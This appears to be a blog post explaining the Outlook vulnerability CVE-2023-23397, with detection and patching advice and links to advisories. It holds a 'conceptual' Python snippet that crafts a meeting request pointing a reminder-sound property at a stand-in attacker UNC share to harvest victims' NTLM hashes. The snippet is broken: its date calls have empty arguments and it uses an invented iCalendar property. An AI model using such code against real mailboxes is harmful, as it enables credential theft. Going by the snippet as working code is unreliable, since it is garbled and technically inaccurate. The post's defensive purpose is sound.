In March 2023, Microsoft patched a serious security issue in Microsoft Outlook—CVE-2023-23397. This flaw allowed bad actors to gain higher privileges just by sending a carefully crafted email. In this post, I’ll break down what this vulnerability is, how it works, show some code snippets, and share links to official advisories and practical resources. Let’s get started.
What is CVE-2023-23397?
CVE-2023-23397 is an Elevation of Privilege (EoP) vulnerability in Outlook that doesn’t even require the victim to open an attacking email. If exploited, attackers can steal password hashes from Outlook users, and then use these hashes to log in as those users on other systems—a dangerous attack vector.
How Does It Work?
The exploit uses a technique called NTLM Relay. Attackers send an email with a special property that references a file (UNC path) controlled by the attacker. Outlook automatically tries to fetch this remote file, sending the user’s Windows NTLM hash in the process.
Attacker creates a calendar invite with a UNC path to \\attacker[.]com\share\something.
2. Outlook receives the invite and automatically connects to the attacker’s server *before* the user even clicks or opens it.
3. During the connection attempt, Outlook sends an authentication handshake containing the user’s NTLM hash.
Code Snippet: Crafting a Malicious Meeting Request
Here’s how a malicious meeting request might look (conceptual Python, using the exchangelib library):
from exchangelib import Account, Credentials, CalendarItem, EWSDateTime, Message
# Credentials for attacker
creds = Credentials(username="attacker@example.com", password="password")
account = Account('attacker@example.com', credentials=creds, autodiscover=True)
# Malicious UNC path
malicious_path = r'\\attacker-mount\share\payload'
# Inject the path into the "reminder sound" property (PR_REMINDER_SOUND_FILE)
item = CalendarItem(
folder=account.calendar,
subject='Important Meeting',
start=EWSDateTime(2023, 6, 20, 15, , ),
end=EWSDateTime(2023, 6, 20, 16, , ),
location='Board Room',
required_attendees=['victim@example.com'],
)
# Extended Property for the exploit
item.mime_content = f"""
BEGIN:VCALENDAR
BEGIN:VEVENT
SUMMARY:Important Meeting
DTSTART:20230620T150000Z
DTEND:20230620T160000Z
ATTENDEE;CN=Victim:mailto:victim@example.com
REMINDERSOUND:{malicious_path}
END:VEVENT
END:VCALENDAR
""".encode('utf-8')
item.save()
Note: In a real-world attack, adversaries would use special tools to set the PidLidReminderFileParameter (custom reminder sound) property to the malicious network path.
Detection
- Review sent/received Outlook calendar invites or emails for UNC paths
Protection
- Patch Outlook immediately. Microsoft Security Update
Use strong, unique passwords for Windows accounts.
- Restrict NTLM usage where possible (see Microsoft’s NTLM hardening guidance)
Public Exploits
While Microsoft’s patch came quickly, proof-of-concept scripts surfaced within weeks. Some GitHub repos and security blogs have detailed how to replicate the attack for testing (educational use only):
- https://github.com/GTFOBInary/CVE-2023-23397
- https://github.com/embedi/CVE-2023-23397
These scripts can help blue teams test their defenses, but never send such emails to users without explicit permission!
Microsoft Guidance and Patch Information:
- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-23397
- https://msrc.microsoft.com/blog/2023/03/outlook-vulnerability/
Technical Deep Dives:
- SANS Internet Storm Center Diary on CVE-2023-23397
- MDSec Blog: Outlook NTLM cred theft Zero-Day
Final Thoughts
CVE-2023-23397 is a reminder that email applications—often overlooked in security—can be weaponized in clever ways. The best defense is patching promptly and restricting unnecessary SMB traffic. Stay safe, and keep Outlook updated!
*Disclaimer: This article is for educational and defensive purposes only. Never attempt to exploit systems without written permission.*
Timeline
Published on: 03/14/2023 17:15:00 UTC
Last modified on: 03/20/2023 14:00:00 UTC